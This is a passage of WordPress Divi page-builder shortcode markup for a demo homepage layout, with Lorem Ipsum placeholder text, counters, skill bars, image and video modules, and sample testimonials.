border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" 